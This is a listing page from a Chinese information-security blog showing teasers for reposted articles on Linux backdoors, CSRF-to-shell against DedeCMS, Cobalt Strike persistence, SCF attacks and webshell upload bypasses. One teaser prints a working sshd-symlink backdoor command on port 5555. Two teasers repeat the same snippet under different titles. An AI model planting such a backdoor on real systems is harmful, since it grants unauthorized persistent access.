终于明白' blog|关注信息安全-最新发布-第4页

终于明白' blog|关注信息安全

欢迎光临
一直在努力

【东京不太热】 Linux经典后门的探究

今天在搜索关于Linux下的后门姿势时,发现一条命令如下: 软链接后门: Default 1 ln –sf /usr/sbin/sshd /tmp/su; /tmp/su –oPort=5555; 经典后门。直接对s...

最新发布 第4页

部分文章收集整理,个人收集学习用,涉及版权利益请联系删除 ⊙﹏⊙‖
经验分享 | Burpsuite插件的使用-终于明白' blog|关注信息安全
转载

经验分享 | Burpsuite插件的使用

 Burp插件的使用 使用准备 Burpsuite可以使用三种语言编写的扩展插件,Java、Python和Ruby。除Java外,其它两种需要的扩展插件需要配置运行环境。 Python 下载地址:http://www.jython.org...

利用CSRF Get DedeCms Shell-终于明白' blog|关注信息安全
转载

利用CSRF Get DedeCms Shell

 说实话,有一两个月没有审计大厂了,然后随便看到群里有人问dede最新有没有漏洞,就下了一套最新的dede,结果我一看还真发现了。  <img alt=”csrf-bear.jpg” src=...

Cobalt Strike实战技巧持久性权限控制姿势-终于明白' blog|关注信息安全
转载

Cobalt Strike实战技巧持久性权限控制姿势

 *本文原创作者:FK_T,本文属FreeBuf原创奖励计划,未经许可禁止转载 前言 想写这篇文章已经有一段时间了,接触Cobalt Strike的时间并不是很长,一个朋友曾开玩笑的说道Cobalt Strike“是灰鸽子的旗舰版”,CS...

SMB共享之SCF文件攻击解析-终于明白' blog|关注信息安全
转载

SMB共享之SCF文件攻击解析

 *本文作者:a.tm.k,本文属 FreeBuf 原创奖励计划,未经许可禁止转载 背景介绍 一次普通的 WEB 测试过程,遇到了一个上传点,可以上传固定图片格式但是可以任意名字+任意后缀名的文件。 <img alt=”...

一个比较好玩的WebShell上传检测绕过案例-终于明白' blog|关注信息安全
转载

一个比较好玩的WebShell上传检测绕过案例

 *本文作者:a.tm.k,本文属 FreeBuf 原创奖励计划,未经许可禁止转载 背景介绍 一次普通的 WEB 测试过程,遇到了一个上传点,可以上传固定图片格式但是可以任意名字+任意后缀名的文件。 <img alt=”...